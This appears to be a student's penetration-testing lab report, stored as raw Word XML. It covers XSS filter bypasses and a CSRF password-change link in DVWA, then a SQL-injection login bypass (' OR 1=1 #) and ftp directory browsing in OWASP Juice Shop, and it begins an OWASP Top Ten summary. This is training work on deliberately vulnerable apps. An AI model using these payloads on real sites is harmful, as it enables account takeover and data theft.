    <w:p w14:paraId="78CD26DE" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7158FC5F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7DD6ADBD" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc115782549"/>
      <w:r>
        <w:t>XSS Stored &amp; Reflected – Medium Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="2FD414C9" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">The difference between Low level and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Medium</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> level in XSS is always the same. They just block the word “script” to prevent the attacker from injecting some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> there. We can easily bypass this by duplicating the word script of putting some letter in upper case or put some space between the letters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762E36DC" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I tried these 2 tricks, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>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5FB9FF0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="3620FB6B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Yes, they blocked the word script but removing it would create another script tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A0892" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="5B07A008" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="4E932853" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7E7ED4AF" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="62B24A4A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="6CD8D784" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc115782550"/>
      <w:r>
        <w:t>XSS Stored &amp; Reflected – High Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="55D0CC9A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">I went to this website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46460E48" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="00000000" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:hyperlink r:id="rId109" w:history="1">
        <w:bookmarkStart w:id="40" w:name="_Toc115782551"/>
        <w:r w:rsidR="009F55FC" w:rsidRPr="005A0D28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
        </w:r>
        <w:bookmarkEnd w:id="40"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="089EADEF" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>and found too many XSS cheat sheet codes that most of them work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A837221" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="005751E7" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="30C4A4F0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">I tried a weird one which is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>drag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to execute and it worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F84E7A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>When I drag the name, alert pops up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E08948" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="2BFF76B3" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="02797CA2" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="09AF10E5" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="1C27E3F5" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="4160F268" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="3F404427" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="1F836F86" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="105A3BFA" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="70BBA68E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="69F19363" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="73B03C44" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="4B04EDD8" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="17255C1A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="0F4B02C0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc115782552"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CSRF (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="4BB54728" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="000441AC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="0477A758" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:t>Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B9E53" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="000441AC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED5E1AB" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc115782553"/>
      <w:r>
        <w:t>CSRF – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="2E3F3F5A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>We get this form to change the password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E3E8E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00947003" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="667E951D" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>When we click on change password, we notice that this GET request is being sent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B60DD" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7B895791" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>From this, we find out that all we need to do to change the password is to execute this link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF140F9" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r w:rsidRPr="000441AC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http://localhost/vulnerabilities/csrf/?password_new=hacker&amp;password_conf=hacker&amp;Change=Change"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68566E7D" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7843486B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="483E3A70" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="1654C769" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc115782554"/>
      <w:r>
        <w:t>CSRF – Medium Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="4D72D020" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="000441AC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="48A73251" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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51422D55" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00077604" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7DC61668" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="33568081" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="188C9DEC" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="65931E08" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="57F3F4B1" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="44FF17B2" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="0087543D" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="093CE900" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C3569B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DE3539" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc115782555"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Juice Shop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ACBF66" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Juice shop has the same purpose as DVWA. It is a website full of vulnerabilities that I can test. It has score board that indicates how far you have discovered all the vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49377C61" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>I will try to implement most of the pen testing skills that I have on it and check my score board.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AB6449" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">Firstly, I like to test the cross-site scripting vulnerabilities. Therefore, let me look for a searching bar and execute some JavaScript code on it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33368F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="19C0F779" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="0491988C" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>As you can see, I managed to find a XSS vulnerability. All I had to do was put this code on an input filed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6095E24A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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711709E5" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Other codes that might work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE38E4E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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03D70069" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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A3766DA" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Some developers know this trick and decide to block the word “script” from all the inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A71A790" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="007D17C9" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The blocking process still executes the input but only deletes the word “script”. Therefore, we can do this trick which is typing the word twice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25362E82" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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2AA2F9FC" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Other vulnerability is being able to access the confidential document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495CFA55" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>We notice on the page About Us, there is a highlighted text that when we hover on it, it indicates that it sends us to this link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFC7B27" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Default="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>I know that the ftp file should have more files that I care to look at. Therefore, I can copy the link and remove the last word because I do not care about that specific file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24445E73" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="6DE81912" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Then a page full of files appear:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C16C9B0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="051A4829" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Now I can download and open any file I want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4F0158" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Let us move to something more interesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF36C80" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>I will go to the log in page, on the username input field, I can type this line to bypass the log in and be able to log in as an admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E965B0A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r w:rsidRPr="0054284C">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’ OR 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492F8817" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">The ‘ closes the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query that the database expects. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84C50E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">The OR statement is for typing something that is true so the database return true to the website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638876BC" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>The # for commenting everything that comes after the true statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05400389" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>The database returns true, and I log in successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D44E34" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="02C8D38C" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="6D684D3E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="556823E2" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="17357649" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7907988C" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="33741E62" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="08BE6242" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc115782556"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OWASP Top Ten</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="0ACC2A7D" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">Open Web Application Security Project is an open-source software that aims to improve the security of web applications. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5586ACD7" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>OWASP Top Ten refers to the top 10 critical security risks to web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA18D1F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>The current version of the list was updated in 2021 whereas the previous one was in 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFB003" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>2021 added some new vulnerabilities. However, most of them remain on the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79001D15" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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B532A1" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B532A1">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">(Picture from </w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:history="1">
        <w:r w:rsidRPr="005A0D28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-top-ten/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B532A1">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAC4E4A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="494415F1" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Let me talk about the top 10 security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540AAD12" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00385FC2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E624F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w: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Default="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A22CD85" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log all the access control failures, and always alert admins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4433262E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0000253B">
        <w:t>Disable web server directory listin</w:t>
      </w:r>
      <w:r>
        <w:t>g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794C9BC2" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0054A5" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BBF876" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>It is the failures that are related to cryptography. This could leak sensitive and secret information that is being sent through the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14379B64" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450FA9C" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not store any sensitive data if you do not need them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AAFDC1" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encrypt all sensitive data.</w:t>
      </w:r>
    </w:p>
